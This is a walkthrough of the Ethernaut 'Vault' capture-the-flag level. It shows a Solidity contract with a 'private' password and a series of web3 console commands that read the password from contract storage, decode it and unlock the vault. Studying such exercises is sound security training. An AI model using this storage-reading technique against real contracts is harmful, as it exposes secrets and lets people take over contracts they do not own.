Ethernaut - 8. Vault
28 Aug 2022ethernaut solidity Difficulty: πππππ
Unlock the vault to pass the level!
Contract
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Vault {
bool public locked;
bytes32 private password;
constructor(bytes32 _password) public {
locked = true;
password = _password;
}
function unlock(bytes32 _password) public {
if (password == _password) {
locked = false;
}
}
}
Writeup
How can we get private variable password ? Well, There is an important method everyone should know : web3.eth.getStorageAt(...), checkout web3.js document to get details.
State variables marked as private and local variables are still publicly accessible.
- Get new Instance.
- Call the method
await contract.locked() // true - Call the method
await web3.eth.getStorageAt('0x7B794D77e945A806b2c6Ca41cb4bB6977F37D340', 1); // '0x412076657279207374726f6e67207365637265742070617373776f7264203a29' - Call web3 method
web3.utils.toAscii('0x412076657279207374726f6e67207365637265742070617373776f7264203a29') // 'A very strong secret password :)' - Call the method
await contract.unlock('0x412076657279207374726f6e67207365637265742070617373776f7264203a29') - Call the method
await contract.locked() // false - Submit instance ΞΎ( βΏοΌβ‘β)